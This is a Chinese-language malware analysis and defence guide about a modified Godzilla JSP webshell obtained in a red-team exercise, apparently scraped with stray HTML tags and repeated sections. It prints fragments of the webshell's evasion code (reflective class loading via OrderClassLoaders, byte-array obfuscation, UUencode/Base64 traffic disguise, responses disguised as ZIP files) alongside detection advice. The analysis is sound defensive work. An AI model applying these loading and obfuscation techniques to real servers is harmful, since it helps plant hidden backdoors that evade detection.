魔改哥斯拉WebShell实战分析与防御指南<\/h1>

一、样本概述<\/h2>

1.1 样本背景<\/h3>

该样本是从某次红队演习中获取的WebShell<\/li>
基于Godzilla（哥斯拉）进行深度魔改<\/li>
通信流量未触发任何安全告警<\/li>

在免杀和绕过WAF\/IDS方面表现优异<\/li> <\/ul>

1.2 样本特征<\/h3>

JSP格式的WebShell<\/li>
使用多重编码混淆（Unicode、字节数组等）<\/li>
硬编码恶意类字节码（Base64编码）<\/li>
采用非传统加密方式的流量混淆<\/li>

利用

com.sun.jmx.remote.util.OrderClassLoaders<\/code>加载恶意类<\/li>
<\/ul>
二、技术分析<\/h2>
2.1 免杀实现机制<\/h3>
2.1.1 类加载机制<\/h4>
\/\/ 使用OrderClassLoaders而非自定义ClassLoader
<\/span><\/span><\/span><\/span>Class PB =<\/span> Class.<\/span>forName<\/span>(<\/span>"com.sun.jmx.remote.util.OrderClassLoaders"<\/span>);<\/span>
<\/span><\/span>java.<\/span>lang<\/span>.<\/span>reflect<\/span>.<\/span>Constructor<\/span> c =<\/span> PB.<\/span>getDeclaredConstructor<\/span>(<\/span>new<\/span> Class[]{<\/span>ClassLoader.<\/span>class<\/span>,<\/span> ClassLoader.<\/span>class<\/span>});<\/span>
<\/span><\/span>c.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Object tadfasf =<\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>();<\/span>
<\/span><\/span>Object d =<\/span> c.<\/span>newInstance<\/span>(<\/span>new<\/span> Object[]{<\/span>tadfasf,<\/span> tadfasf});<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 反射调用defineClass方法
<\/span><\/span><\/span><\/span>java.<\/span>lang<\/span>.<\/span>reflect<\/span>.<\/span>Method<\/span> lll =<\/span> PB.<\/span>getSuperclass<\/span>().<\/span>getDeclaredMethod<\/span>(<\/span>"defineClass"<\/span>,<\/span> 
<\/span><\/span>    new<\/span> Class[]{<\/span>byte<\/span>[].<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>});<\/span>
<\/span><\/span>lll.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Class zz =<\/span> (<\/span>Class)<\/span> lll.<\/span>invoke<\/span>(<\/span>d,<\/span> new<\/span> Object[]{<\/span>var2,<\/span> 0<\/span>,<\/span> var2.<\/span>length<\/span>});<\/span>
<\/span><\/span><\/code><\/pre>2.1.2 混淆技术<\/h4>

关键类名和方法名使用字节数组编码：
new<\/span> String(<\/span>new<\/span> byte<\/span>[]{<\/span>46<\/span>,<\/span> 115<\/span>,<\/span> 117<\/span>,<\/span> 110<\/span>,<\/span> 46<\/span>,<\/span> 111<\/span>,<\/span> 114<\/span>,<\/span> 103<\/span>})<\/span> \/\/ ".sun.org"
<\/span><\/span><\/span><\/code><\/pre><\/li>
插入Unicode空白符混淆<\/li>
使用JSP标签而非纯Java代码<\/li>
<\/ul>
2.2 命令执行机制<\/h3>
2.2.1 执行流程<\/h4>

实例化恶意类<\/li>
调用equals<\/code>方法处理输入（"解密"流量）<\/li>
调用toString<\/code>方法执行命令并返回结果（"加密"响应）<\/li>
<\/ol>
2.2.2 核心恶意类方法<\/h4>
\/\/ 命令执行入口
<\/span><\/span><\/span><\/span>public<\/span> byte<\/span>[]<\/span> run<\/span>()<\/span> {<\/span>
<\/span><\/span>    String className =<\/span> this<\/span>.<\/span>get<\/span>(<\/span>"evalClassName"<\/span>);<\/span>
<\/span><\/span>    String methodName =<\/span> this<\/span>.<\/span>get<\/span>(<\/span>"methodName"<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    if<\/span> (<\/span>methodName !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        if<\/span> (<\/span>className ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            \/\/ 直接调用方法
<\/span><\/span><\/span><\/span>        }<\/span> else<\/span> {<\/span>
<\/span><\/span>            \/\/ 通过反射调用指定类的方法
<\/span><\/span><\/span><\/span>            Class clazz =<\/span> (<\/span>Class)<\/span> this<\/span>.<\/span>sessionMap<\/span>.<\/span>get<\/span>(<\/span>className);<\/span>
<\/span><\/span>            Object instance =<\/span> clazz.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>            instance.<\/span>equals<\/span>(<\/span>this<\/span>.<\/span>parameterMap<\/span>);<\/span>
<\/span><\/span>            instance.<\/span>toString<\/span>();<\/span>
<\/span><\/span>            return<\/span> (<\/span>byte<\/span>[])<\/span> this<\/span>.<\/span>parameterMap<\/span>.<\/span>get<\/span>(<\/span>"result"<\/span>);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> "method is null"<\/span>.<\/span>getBytes<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.3 流量混淆机制<\/h3>
2.3.1 请求处理流程<\/h4>

提取请求参数值<\/li>
替换特定字符（如'm'→'%'）<\/li>
URL解码<\/li>
多层解码处理：
\/\/ 字符替换
<\/span><\/span><\/span><\/span>todecode =<\/span> todecode.<\/span>replaceAll<\/span>(<\/span>"b"<\/span>,<\/span> "\n"<\/span>)<\/span>
<\/span><\/span>                  .<\/span>replaceAll<\/span>(<\/span>"a"<\/span>,<\/span> "="<\/span>)<\/span>
<\/span><\/span>                  .<\/span>replaceAll<\/span>(<\/span>"c"<\/span>,<\/span> "&"<\/span>)<\/span>
<\/span><\/span>                  \/\/ ...其他替换规则
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ UU解码
<\/span><\/span><\/span><\/span>byte<\/span>[]<\/span> uu_tmp =<\/span> Uudecode(<\/span>todecode.<\/span>getBytes<\/span>());<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ Base64解码
<\/span><\/span><\/span><\/span>var1 =<\/span> base64Decode((<\/span>new<\/span> String(<\/span>uu_tmp)).<\/span>substring<\/span>(<\/span>13<\/span>));<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2.3.2 响应处理流程<\/h4>

执行命令获取原始结果<\/li>
GZIP压缩结果<\/li>
添加ZIP文件头（PK...）<\/li>
通过输出流返回<\/li>
<\/ol>
2.4 通信示例<\/h3>
请求示例<\/h4>
POST \/shell.jsp HTTP\/1.1
Content-Type: application\/x-www-form-urlencoded

password=test&action=login&token=abc123&data=begin+644+encoder.buf...
<\/code><\/pre>
响应示例<\/h4>
HTTP\/1.1 200 OK
Content-Disposition: attachment; filename=1621234567890.zip

PK...<GZIP压缩的命令结果>...
<\/code><\/pre>
三、防御方案<\/h2>
3.1 检测方案<\/h3>
静态检测<\/h4>

检测异常JSP标签使用<\/li>
识别多重编码特征（Base64+UUencode）<\/li>
查找OrderClassLoaders<\/code>的异常使用<\/li>
检测硬编码的字节数组类名<\/li>
<\/ol>
动态检测<\/h4>

监控异常的defineClass<\/code>调用<\/li>
检测无加密但结构复杂的HTTP流量<\/li>
分析异常的响应头（如伪造的ZIP文件）<\/li>
<\/ol>
3.2 防护建议<\/h3>


代码层面<\/strong><\/p>

禁用危险的JSP标签<\/li>
限制反射操作权限<\/li>
监控ClassLoader的异常行为<\/li>
<\/ul>
<\/li>

网络层面<\/strong><\/p>

深度解析HTTP参数（不只是键值对）<\/li>
检测异常的字符替换模式<\/li>
监控异常的Content-Disposition响应头<\/li>
<\/ul>
<\/li>

管理层面<\/strong><\/p>

定期更新WebShell特征库<\/li>
加强文件上传检测<\/li>
实施严格的权限控制<\/li>
<\/ul>
<\/li>
<\/ol>
四、技术总结<\/h2>


免杀创新点<\/strong><\/p>

抛弃传统加密，采用多层编码混淆<\/li>
利用系统类OrderClassLoaders<\/code>替代自定义ClassLoader<\/li>
多重编码混淆关键代码<\/li>
<\/ul>
<\/li>

流量隐蔽性<\/strong><\/p>

模拟正常业务参数（password\/token等）<\/li>
使用少见编码方式（UUencode）<\/li>
响应伪装成ZIP文件<\/li>
<\/ul>
<\/li>

对抗启示<\/strong><\/p>

传统加密WebShell已可被有效检测<\/li>
编码混淆可能比加密更具隐蔽性<\/li>
安全设备需结合静态+动态+行为分析<\/li>
<\/ul>
<\/li>
<\/ol>
五、附录<\/h2>
关键类结构<\/h3>
public<\/span> class<\/span> SimpleVer<\/span> extends<\/span> ClassLoader {<\/span>
<\/span><\/span>    \/\/ 核心方法
<\/span><\/span><\/span><\/span>    public<\/span> boolean<\/span> equals<\/span>(<\/span>Object var1)<\/span> {<\/span> \/* 处理输入 *\/<\/span> }<\/span>
<\/span><\/span>    public<\/span> String toString<\/span>()<\/span> {<\/span> \/* 执行命令并返回 *\/<\/span> }<\/span>
<\/span><\/span>    public<\/span> byte<\/span>[]<\/span> run<\/span>()<\/span> {<\/span> \/* 命令执行入口 *\/<\/span> }<\/span>
<\/span><\/span>    public<\/span> void<\/span> formatParameter<\/span>()<\/span> {<\/span> \/* 流量解码 *\/<\/span> }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 功能方法
<\/span><\/span><\/span><\/span>    public<\/span> byte<\/span>[]<\/span> getBasicsInfo<\/span>()<\/span> {<\/span> \/* 获取系统信息 *\/<\/span> }<\/span>
<\/span><\/span>    public<\/span> byte<\/span>[]<\/span> include<\/span>()<\/span> {<\/span> \/* 动态加载类 *\/<\/span> }<\/span>
<\/span><\/span>    public<\/span> static<\/span> byte<\/span>[]<\/span> Uudecode<\/span>()<\/span> {<\/span> \/* UU解码 *\/<\/span> }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>编码对照表<\/h3>



编码字符<\/th>
实际字符<\/th>
<\/tr>
<\/thead>


a<\/td>
=<\/td>
<\/tr>

b<\/td>
\n<\/td>
<\/tr>

c<\/td>
&<\/td>
<\/tr>

...<\/td>
...<\/td>
<\/tr>
<\/tbody>
<\/table>

编码字符<\/th>	实际字符<\/th> <\/tr> <\/thead>
a<\/td>	=<\/td> <\/tr>
b<\/td>	\n<\/td> <\/tr>
c<\/td>	&<\/td> <\/tr>
...<\/td>	...<\/td> <\/tr> <\/tbody> <\/table>

魔改哥斯拉WebShell实战分析与防御指南<\/h1>

一、样本概述<\/h2>

二、技术分析<\/h2>

2.1 免杀实现机制<\/h3>

2.2 命令执行机制<\/h3>

2.3 流量混淆机制<\/h3>

2.4 通信示例<\/h3>

三、防御方案<\/h2>

3.1 检测方案<\/h3>

五、附录<\/h2>

编码对照表<\/h3> 编码字符<\/th> 实际字符<\/th> <\/tr> <\/thead> a<\/td> =<\/td> <\/tr> b<\/td> \n<\/td> <\/tr> c<\/td> &<\/td> <\/tr> ...<\/td> ...<\/td> <\/tr> <\/tbody> <\/table>

编码对照表<\/h3>

编码字符<\/th> 实际字符<\/th> <\/tr> <\/thead>

a<\/td> =<\/td> <\/tr>
b<\/td> \n<\/td> <\/tr>
c<\/td> &<\/td> <\/tr>
...<\/td> ...<\/td> <\/tr> <\/tbody> <\/table>